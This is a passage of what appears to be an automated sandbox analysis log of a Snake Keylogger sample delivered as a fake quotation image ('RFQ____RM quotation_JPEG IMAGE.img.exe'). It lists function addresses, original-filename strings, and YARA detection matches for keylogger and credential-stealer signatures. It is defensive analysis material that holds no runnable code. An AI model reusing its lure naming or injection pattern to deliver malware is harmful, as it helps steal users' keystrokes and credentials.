                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AEC4273_2_05AEC427
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE7FA93_2_05AE7FA9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE8EB03_2_05AE8EB0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE8EC03_2_05AE8EC0
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AE00063_2_05AE0006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05AED2F83_2_05AED2F8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05B600063_2_05B60006
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05B600403_2_05B60040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DEDBE83_2_05DEDBE8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DD00403_2_05DD0040
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DD00073_2_05DD0007
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeCode function: 3_2_05DECF383_2_05DECF38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F61085_2_010F6108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FC1905_2_010FC190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FF0075_2_010FF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FB3285_2_010FB328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FC4705_2_010FC470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F67305_2_010F6730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FC7525_2_010FC752
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F97E85_2_010F97E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FBBD25_2_010FBBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FCA325_2_010FCA32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010F4AD95_2_010F4AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FBEB05_2_010FBEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FE5175_2_010FE517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FE5285_2_010FE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_010FB4F25_2_010FB4F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068184605_2_06818460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06817D905_2_06817D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068100405_2_06810040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068138705_2_06813870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068111C05_2_068111C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681CEEB5_2_0681CEEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681CEF85_2_0681CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F6005_2_0681F600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F6105_2_0681F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C6385_2_0681C638
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C6485_2_0681C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D7985_2_0681D798
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D7A85_2_0681D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068104905_2_06810490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068104A05_2_068104A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E4A05_2_0681E4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E4B05_2_0681E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B4D75_2_0681B4D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B4E85_2_0681B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681DC005_2_0681DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681BD885_2_0681BD88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681BD985_2_0681BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06810D515_2_06810D51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681ED505_2_0681ED50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06810D605_2_06810D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681ED605_2_0681ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681CAA05_2_0681CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681FA595_2_0681FA59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681FA685_2_0681FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068173D85_2_068173D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068173E85_2_068173E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681DBF15_2_0681DBF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D3405_2_0681D340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681D3505_2_0681D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068108F05_2_068108F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E8F85_2_0681E8F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068100075_2_06810007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E04B5_2_0681E04B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E0585_2_0681E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068138605_2_06813860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F1A95_2_0681F1A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068111B05_2_068111B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681F1B85_2_0681F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C1E05_2_0681C1E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681C1F05_2_0681C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068109005_2_06810900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681E9085_2_0681E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B9305_2_0681B930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0681B9405_2_0681B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B6E85_2_0684B6E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068486085_2_06848608
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684AA585_2_0684AA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684D6705_2_0684D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684C3885_2_0684C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06848BF35_2_06848BF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B0A05_2_0684B0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684A4085_2_0684A408
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684D0285_2_0684D028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068400405_2_06840040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068411A05_2_068411A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684C9D85_2_0684C9D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684BD385_2_0684BD38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845EB85_2_06845EB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845EC85_2_06845EC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B6D95_2_0684B6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684560B5_2_0684560B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068456185_2_06845618
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684AA485_2_0684AA48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845A605_2_06845A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684D6615_2_0684D661
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06845A705_2_06845A70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068433A85_2_068433A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068433B85_2_068433B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06846BC15_2_06846BC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_06846BD05_2_06846BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684A3F85_2_0684A3F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068463135_2_06846313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068463205_2_06846320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068437305_2_06843730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068467685_2_06846768
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068467785_2_06846778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684C3785_2_0684C378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_0684B08F5_2_0684B08F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068404885_2_06840488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068474975_2_06847497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068404985_2_06840498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068474A85_2_068474A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068408E05_2_068408E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068408F05_2_068408F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_068478F05_2_068478F0
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000000.2052909448.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2087239384.000000000144E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2110257215.00000000061F7000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameHlytzfcdj.dll" vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameHlytzfcdj.dll" vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2110612573.0000000006280000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameHlytzfcdj.dll" vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, Binary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
